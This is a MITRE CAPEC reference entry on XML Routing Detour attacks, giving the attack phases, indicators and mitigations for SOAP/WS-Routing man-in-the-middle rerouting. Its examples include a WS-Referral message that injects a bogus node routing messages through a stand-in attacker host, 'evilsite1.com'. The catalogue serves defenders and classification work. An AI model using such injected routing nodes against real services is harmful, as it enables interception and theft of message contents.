Home > CAPEC List > CAPEC-219: XML Routing Detour Attacks (Version 2.4)  

CAPEC-219: XML Routing Detour Attacks

 
XML Routing Detour Attacks
Definition in a New Window Definition in a New Window
Attack Pattern ID: 219
Abstraction: Standard
Status: Draft
Completeness: Complete
+ Description

Summary

An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Man in the Middle type attacks. The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.

Attack Execution Flow

Explore
  1. Survey the target:

    Using command line or an automated tool, an attacker records all instances of web services to process XML requests.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    Use automated tool to record all instances to process XML requests or find exposed WSDL.

    env-Web env-ClientServer
    2

    Use tools to crawl WSDL

    env-Web env-ClientServer

    Indicators

    IDTypeIndicator DescriptionEnvironments
    1Positive

    The URL processes XML requests.

    env-Web env-ClientServer
    2Inconclusive

    The application does not accept XML requests.

    env-Web env-ClientServer
Experiment
  1. Identify SOAP messages that have multiple state processing.:

    Inspect instance to see whether the XML processing has multiple stages or not.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    Inspect the SOAP message routing head to see whether the XML processing has multiple stages or not.

    env-Web env-ClientServer

    Indicators

    IDTypeIndicator DescriptionEnvironments
    1Positive

    The SOAP message has multiple stage processing.

    env-Web env-ClientServer
    2Negative

    The SOAP message does not have intermediate nodes.

    env-Web env-ClientServer

    Outcomes

    IDTypeOutcome Description
    1Success
    A list of URLs which have multiple stages to process XML contents.

    Security Controls

    IDTypeSecurity Control Description
    1Detective
    Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Exploit
  1. Launch an XML routing detour attack:

    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message identified in the Explore phase. Thus, the attacker can route the XML message to the attacker controlled node (and access the message contents).

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    The attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header of the SOAP message

    env-Web env-ClientServer

    Outcomes

    IDTypeOutcome Description
    1Success
    The XML message is routed to the attacker controlled node.

    Security Controls

    IDTypeSecurity Control Description
    1Preventative
    Use SSL for connections between all parties with mutual authentication.
+ Attack Prerequisites
  • The targeted system must have multiple stages processing of XML content.

+ Typical Severity

Medium

+ Typical Likelihood of Exploit

Likelihood: High

+ Methods of Attack
  • Protocol Manipulation
  • Injection
+ Examples-Instances

Description

Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).

(Attack)
 

Example SOAP message with routing information in header:

<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>

Add an additional node (example3.com/router) to the XML path in a WS-Referral message

<r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://example3.com/router</r:via> </r:go> </r:ref>
(Result)
 

Resulting in the following SOAP Header:

<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body>
...
</S:Body> </S:Envelope>

In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that he/she has targeted.

(Attack)
 

Example of WS-Referral based WS-Routing injection of the bogus node route:

<r:ref xmlns:r="http://schemas.example.com/referral"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://evilsite1.com/router</r:via> </r:go> </r:ref>
(Result)
 

Resulting XML Routing Detour attack:

<S:Envelope> <S:Header> <m:path xmlns:m="http://schemas.example.com/rp/" S:actor="http://schemas.example.com/soap/actor" S:mustUnderstand="1"> <m:action>http://example_0.com/</m:action> <m:to>http://example_4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://evilesite1.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>

Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

To inject a bogus node in the XML routing table

+ Resources Required

The attacker must be able to insert or compromise a system into the processing path for the transaction.

+ Solutions and Mitigations

Design: Specify maximum number intermediate nodes for the request and require SSL connections with mutual authentication.

Implementation: Use SSL for connections between all parties with mutual authentication.

+ Attack Motivation-Consequences
ScopeTechnical ImpactNote
Integrity
Modify application data
Confidentiality
Read application data
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
+ Injection Vector

The routing table of the XML Header

+ Payload

The bogus routing node in the routing table of XML header

+ Activation Zone

The route between the XML message sender and receiver.

+ Payload Activation Impact

Description

Information Leakage

+ Purposes
  • Exploitation
+ CIA Impact
Confidentiality Impact: HighIntegrity Impact: MediumAvailability Impact: Low
+ Technical Context
Architectural Paradigms
Client-Server
Frameworks
All
Platforms
All
+ References
[R.219.1] [REF-1] "WASC Threat Classification 2.0". WASC-32 - Routing Detour. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/w/page/13246956/Routing-Detour>.
[R.219.2] [REF-14] Andre Yee. "Threat Protection in a Service Oriented World". NFR Security. <http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf>.
[R.219.3] [REF-15] Pete Lindstrom. "Attacking & Defending Web Services". SPiRE Security. 2002. <http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf>.
+ Content History
Modifications
ModifierOrganizationDateCommentsSource
Min XuCigital, Inc.Pre-review - 0.1
Romain GaucherCigital, Inc.Performed a review of content and added additional content
CAPEC Content TeamThe MITRE Corporation2014-02-06Updated Attack_Phases, Examples-InstancesInternal

Page Last Updated: April 10, 2014